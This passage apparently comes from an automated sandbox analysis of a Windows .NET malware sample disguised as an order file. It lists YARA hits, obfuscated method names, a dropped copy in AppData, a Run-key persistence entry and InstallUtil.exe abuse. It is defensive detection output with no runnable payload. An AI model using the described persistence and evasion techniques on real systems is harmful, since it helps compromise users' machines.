                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.GEFA-Order 232343-68983689.exe.45a8650.6.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.GEFA-Order 232343-68983689.exe.45a8650.6.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.GEFA-Order 232343-68983689.exe.45a8650.6.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.GEFA-Order 232343-68983689.exe.45a8650.6.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.GEFA-Order 232343-68983689.exe.45a8650.6.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.6ea0000.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.1653047795.0000000003042000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1410088723.0000000006EA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1566745789.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1389741733.0000000003252000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7416, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fqhnalw.exe PID: 7784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fqhnalw.exe PID: 7972, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_030B4D1B push E4057763h; ret 0_2_030B4D25
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D62EA7 push esp; retf 0_2_06D62EA8
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06DD3228 push es; ret 0_2_06DD3244
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F13D98 push es; iretd 0_2_06F13DF8
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F1C328 push es; ret 0_2_06F1C340
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F235F3 push edi; retf 0_2_06F235F6
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F259F9 push es; retf 0_2_06F25A14
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F259C1 push es; retf 0_2_06F259C4
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F37791 push es; ret 0_2_06F37760
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F37750 push es; ret 0_2_06F37760
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06FF6EAB push ecx; ret 0_2_06FF6EAC
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06FF75A3 push es; retf 0_2_06FF75A4
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06FF8137 push es; retf 0_2_06FF8144
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06FF8120 push es; retf 0_2_06FF8134
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05B32AA8 push ebp; ret 2_2_05B32B15
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_01314D1B push E4053963h; ret 4_2_01314D25
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06972EA7 push esp; retf 4_2_06972EA8
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E3228 push es; ret 4_2_069E3244
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B335F3 push edi; retf 4_2_06B335F6
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B359FA push es; retf 4_2_06B35A14
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B47750 push es; ret 4_2_06B47760
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06C071AF push es; ret 4_2_06C071B0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A12EA7 push esp; retf 6_2_06A12EA8
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A83228 push es; ret 6_2_06A83244
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BCC33A push es; ret 6_2_06BCC340
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BD35F3 push edi; retf 6_2_06BD35F6
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BD5C8D push es; iretd 6_2_06BD5C9C
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BD59BD push es; retf 6_2_06BD59C4
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06BD59EE push es; retf 6_2_06BD5A14
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06CA71AF push es; ret 6_2_06CA71B0
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6c10000.9.raw.unpack, PWuAggHN1HpMin2PDW6.csHigh entropy of concatenated method names: 'O7EHmGWwrv', 'JUlgefjRAuMnh7Hg3aj', 'fL0H2Qj05n5mT42iUOT', 'wAMSf4j29PcevwbpKob', 'mHTe4cjhBAGQmCr6xO1', 'Vi4UuVj4plQ9OoVvyUg', 'VuaXtZjudjESyFFUTOg', 'u1CaaWjIlBsqZviuhhN'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6c10000.9.raw.unpack, x8qeriHsBiUsCQ7g3Bh.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'WknHoSKiuK', 'NtProtectVirtualMemory', 'um9CMOjkTJBulBtD1M6', 'AgV0kbjc7MCu5ZFEpup', 'ktjuabjyTc4tQaY8LFM', 'IiROs2jP1JToUIORgjU'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, wPjajNLxVBtGCJ45WII.csHigh entropy of concatenated method names: 'ATNLsnd3gI', 'xe0LAtDy58', 'OA5xFRExuLUORWWkLMV', 'yN7xedEXoEaL9xgYHKx', 'H3MVXfEsohQ8ovj4PLy', 'yoGBYrECHASZRo8Nvtb', 'fsdDcTEbcK1xd1SD2vI', 'rHGCqOEAaXvb2At54Vi', 'PtSO4FEoggL5JR40DHM', 'cWva4nE3G1xQugeWYHX'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, QHduFXLaVP1TF6Ocs6J.csHigh entropy of concatenated method names: 'gq5nWAac56', 'iApdoSpoYlHMYZHX9xy', 'Y3jNd7p3GlK61ruKs7k', 'PqhGHepGlv6IXokSEcJ', 'VUa4P9pjaVYPTlDBaB2', 'PfncjDpsvYFuy0i2F9b', 'KwJR3EpA6lfFe0shIxL', 'zNy03GpUU77HwMa9kBV'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'hZwBFkEZPJ9N4PRApwN'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, FmqK0HYXcqdWWCTqseo.csHigh entropy of concatenated method names: 'x9EYArtnLA', 'uK3YNlUhPMCArIgVk6o', 'QT7UukU4pLA8lP3Kquw', 'QWRJckURduFnJxXATs9', 'J4TPZ3U0VQCy5KZNZiN', 'AUsrduU23X04851qJT3', 'WNOXccUWDCkbdLjyMP4', 'FeNhYZUz04smZQHRQC9', 'NdRYHIUwgyyekshQLXH', 'RAjrCaUZdbqXlW1RIAy'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, kiieacYyLDVXknvEPce.csHigh entropy of concatenated method names: 'AlXYPLE6X5', 'om3QBSavvFVAol3lZSO', 'X5r1DdanjKMuNxcCxmI', 'g01YW7aMI6O63Llhsj6', 'jeNMsJar1ZGo6LUHcY6', 'okrQ7WaOFyZ9JgayMWK', 'mlLthBadqIqUd1XAie3', 'be3IHHaPT6ExNOOeAKi', 'd1MojBammXKB9GAawEd'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, JxjTJsLcVMlWTHfxdv2.csHigh entropy of concatenated method names: 'ha7SB8pcwohQTThramj', 'OWf1c7pyXxHdaePwK3m', 'WQoFFTjuuB', 'qxXrJFpv4ptGFiyYk9Z', 'DWLNmfpnk3gHBjuGdRk', 'NhSmiRpMeAmYSslhmVV', 'mg8uXdprcvJDTJ2npt7', 'wkKSmrpO8jZJ9NGZRhT', 'HQFYs0pd8WGiLN9GBCe', 'g41RZQpu9VO1tQ0D1Pq'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, PWuAggHN1HpMin2PDW6.csHigh entropy of concatenated method names: 'O7EHmGWwrv', 'JUlgefjRAuMnh7Hg3aj', 'fL0H2Qj05n5mT42iUOT', 'wAMSf4j29PcevwbpKob', 'mHTe4cjhBAGQmCr6xO1', 'Vi4UuVj4plQ9OoVvyUg', 'VuaXtZjudjESyFFUTOg', 'u1CaaWjIlBsqZviuhhN'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, gZTcoBYIhXdy8A0494X.csHigh entropy of concatenated method names: 'kg6Y7GGPri', 'PSFvb4N9R1M85gZ3BGe', 'tjt38wN5j8RIBHWkR5G', 'etegSYNqskh2XUiBe31', 'afvA92NSfLVjZJPBuCB', 'zBXwouNf6nPGHjTgZqY', 'Ee1kmkNKbfprBSATHkT', 'LP5smUNHmRSlk0xrc3r', 'tkMEvYN8JJ7144rmjCt', 'XkMniDNQMdSSMxcRBK5'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, RjtGPgY4ymoWKP9ii5p.csHigh entropy of concatenated method names: 'qnmY06nfww', 'hxiaYgNleqa8Ij0RHLB', 'CMF11INtdciGSIwEtAT', 'xibCeDNJeMLkNyKlkGm', 'ebjUHtNDYijVk70mM7O', 'gIbv8KNCe6kYxNLV48y', 'xTCH9CNbhksnHZ3o88R', 'TgiFRDNxosnOFaqKxwD', 'D1LRsONVmqM8HXcuuKI', 'tuEVwXNewUSk67Nsv30'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, f3wXxBYNq9F1SJgcUAq.csHigh entropy of concatenated method names: 'MBLYpLGR3N', 'VxSYcixvpL', 'wlydAEaFpgvIIuTqT0h', 'wwaikWaikM19y53SFgJ', 'UOJXPoaTwCcGklhKiLm', 'jFjyF7aBPcX8w1wAFKT', 'dT77ISa6dcY46R1hJ0M', 'ydmWsNaVdKjeuBMdeuj', 'aTbeXxaeE57U4Jl2g5F', 'sqaggAal43xdlCrjFMN'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, oEEQSgFyPd15mbdaK5K.csHigh entropy of concatenated method names: 'EbmFgeoxxX', 'LGkF70Dbmo', 'Wn8Fwuvqag', 'NG6FZDADem', 'VlEFh86t7U', 'VZlF4jfUb5', 'vhpFRVrJT7', 'Uo1F0jtXvb', 'TDoF2wX7b4', 'gacFWvKVV4'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, fI4G2qLelv5bYkkZfpj.csHigh entropy of concatenated method names: 'vWgLt8TaMG', 'aHrLJeuiPO', 'XabPdkN4UbvilcqtXVn', 'ROl5i9NZZp6cLKxXlV5', 'XTHow0NhUD7tlZauZ5o', 'Sq8c64NRT0deAZOWuS5', 'Wdi3eIN08Chm5XppncO', 'lwZupnN2slPSFm5aLqY', 'H7PuGdNWsoEUCe0DqUa', 'mdbHvlNzmamwnVBPP1x'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, Co0A9jqXlr6qGqDdKMt.csHigh entropy of concatenated method names: 'NxgqALMbaq', 'GlOp7HovgSQ8ggHV1Hy', 'b6uvfIonWikyy3StJV5', 'vncP3woMLUEH8i1wwrx', 'zAJcx4ortoAle3OE1OY', 'U2bxVEoOg1Y5xs1tSfZ', 'qZYDSfodUCw2wTRE71o', 'ViyhgnouP4ksp6M6axP', 'YWurRroIPxkglApBDO4', 'ngAX3Hogn87nTcMrTh2'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, kncZcYYjmBu2V9XP5yZ.csHigh entropy of concatenated method names: 'j13Ya76HV1', 'hJfvSwaHT4gGhWRvwMj', 'GthVhna8T6xbkQUYCAK', 'QgEnJ5aQYgbkQaXmjLI', 'WuWs5RaYgJaE3Fwb4UX', 'sP29pOaLakEYCyoQb9S', 'QEEsZiafNmf8B5xwy0v', 'plB5LyaKGtyJobgW2iR'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, EU5KwsKPaHxhtlegHuv.csHigh entropy of concatenated method names: 'gK2KvebP0W', 'x2lKnlsI8P', 'M93KMoWeGk', 'VFTFDDGrskPYkUJWaE0', 'JPug6TGOjfRMUZn1Lkr', 'aul52YGnA6ur6cFquXW', 'OJq00rGMOD7MTpqsybI', 'L9CSAKGdpHGrCxj0U73', 'lNnq7ZGuXrMvBd7wwUG', 'OHVqOwGIIbmhfMMhaDT'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, oQye58HYTNSxVojPK90.csHigh entropy of concatenated method names: 'yYAH1Q1uST', 'nDjHipEjI5', 'pduHBpe1LA', 'e46HVkRBQT', 'VIbHelx4g5', 'NcvHl2lgEP', 'qNsHtoefZK', 'kLbHJV5wxK', 'xcAHDD4qe8', 'uQeHCO2UKk'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, M9JfWZY2VRjiUYPybnl.csHigh entropy of concatenated method names: 'bjJYzegChl', 'l6oL5FPVH6', 'OBJL9hrJrI', 'RupHt8NoJNuk4JejgSa', 'W4ZSOcN3dasRruXFSYV', 'egayr0Nsqnk8GLhHmVN', 'H70NshNAlTn9T8quvof', 'GpmxC4NGrs3LqVYbuKu', 'KqWhyTNjrlCSs5o4WgR', 'rnH7pjNUTkL4VHMaLOl'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, CQA4r2LoH9wH6pUdYJC.csHigh entropy of concatenated method names: 'wOkLGwVGqF', 'DoKjGSEa43XMtHTeaia', 'P6foXeENbX0uw9Z2Cyt', 'uH23nDEEiVTVuU73tvs', 'PXgnuyEpd5VsTTlts9g', 'KuhpHhEc1CYwRnZXsod', 'nOWqwIEjnmZux0q8NT9', 'nfoN5CEUK1pikVHcCqc'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, IZZy7JLDFeenSO0icyT.csHigh entropy of concatenated method names: 'n5uLbS790s', 'dpq3QgETb4y1sZdktib', 'fS4fNJEBaX9NOMSD48T', 'yvUUGvE6Ljrka1ZflwX', 'W0vqyjEVGIertMiJl1p', 'HkN6ftEe23cB93FHqug', 'ajj39FElAcv2Hi87rPC', 'dkvVtVEtOfnwMkviuCT', 'KvhmEdEJlr9kM19LfZA', 'LcZFcWEFgSPtOLs4KMW'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, vVvmoAKshOI3CYByEU9.csHigh entropy of concatenated method names: 'I2yKolROla', 'AuvK32fgpu', 'zHrCRk3gOesgIX0f9Sa', 'LtLIHa378qOeleAJl1t', 'MxXjaW3whjbRNa5csRM', 'bhJHex3ZmYFiHLfStlN', 'U7atlO3hxS0N12MKDQk', 'INFDYd34YQtVwK1DvGL', 'FS87Fe3R30eTVwMFJ0U'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, giuiruLLVoSgHCDgSKv.csHigh entropy of concatenated method names: 'BxgLFO3gGZ', 'akZj4ONm5aRJKKRDvGu', 'QKp4X2Nv4xHEiWwqweZ', 'U7BDDhNnXle51mA56yG', 'yHr2yZNMM60PrLZXjTS', 'uVf0TQNrgZV3cfxfcGM', 'J4LOmONOPV8A5iVN48V', 'xIghixNkcxpO0RTVkvc', 'oANC1rNPVXlc7118a0H'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, a4Q8BdKaRRTEoOpd3I2.csHigh entropy of concatenated method names: 'TgIKErhDYs', 'f1aKp83qHd', 'JWuKcKbomk', 'LkhKyF1JHY', 'e6lKkxchgj', 'rcUWmFGKolveZJaBSw2', 'DyrWDjGHLF3h9SjnO6X', 'gBhOqFG8reOgH6rmmOG', 'BPq10sGQVfZSty6Idjk', 'cnfy2oGYlaqoIqnXXRC'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, qAH9T2bbgSkLUxZjiJ.csHigh entropy of concatenated method names: 'suGXRc12y', 'Jf5sTIlN4', 'Hfao9G144', 'nSNAEYdE2', 'hiK0gXofhLaICRXyqbI', 'JOB0y0oKGfUQECWPX5O', 'V1jTA2oHo4tiSNx6oL3', 'nKCIQTo8LbpjFL29nx3', 'mYUqmBoQ7xnCANPefDX', 'k7DnC1oYDfF3YUZ5e2C'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, x8qeriHsBiUsCQ7g3Bh.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'WknHoSKiuK', 'NtProtectVirtualMemory', 'um9CMOjkTJBulBtD1M6', 'AgV0kbjc7MCu5ZFEpup', 'ktjuabjyTc4tQaY8LFM', 'IiROs2jP1JToUIORgjU'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, gwdD7dYmtsJfGI2KoDq.csHigh entropy of concatenated method names: 'gJhYr6TQTt', 'FFcYO7lHBN', 'u5HYnqDIXe', 'd7aYMkdxJD', 'VsVV8ua7L4jK21wIale', 'eJEN68awnikXOKyrn9U', 'xw4cHaaZcqyPVZ4nXHr', 'IqA1lCah1T37TsQtmBi', 'bMtpdFa4gCii6BjmUT8', 'aAURTkaISa9mFLkgGOe'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, fMAQMyit16EiVpv4oy.csHigh entropy of concatenated method names: 'cvW6i2gqS', 'O7nVEagse', 'kbulCL4BG', 'AKktwvlG1', 'm0kB48BXB', 'JmtnceARWsbB6kymmMr', 'UscHXbA0eliFm6UTVX6', 'VwdoU4A2dBmnO9nwyG9', 'Sa1EYgAWyJTCtXW5uJu', 'wHUg7nAziaEoCGaawGZ'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, JFxFC0FzswD4FBtcil6.csHigh entropy of concatenated method names: 'tSglXerwKn', 'nlFlsXvqKn', 'fUJlAYjKk3', 'q8Alo9jTxP', 'EIDl324hDU', 'csMlGUs1po', 'OihljhhVjV', 'EVGixepXoY', 'EJ0lU7mDCr', 'KtllaRbuXe'
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeFile created: C:\Users\user\AppData\Roaming\Fqhnalw.exeJump to dropped file
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FqhnalwJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FqhnalwJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
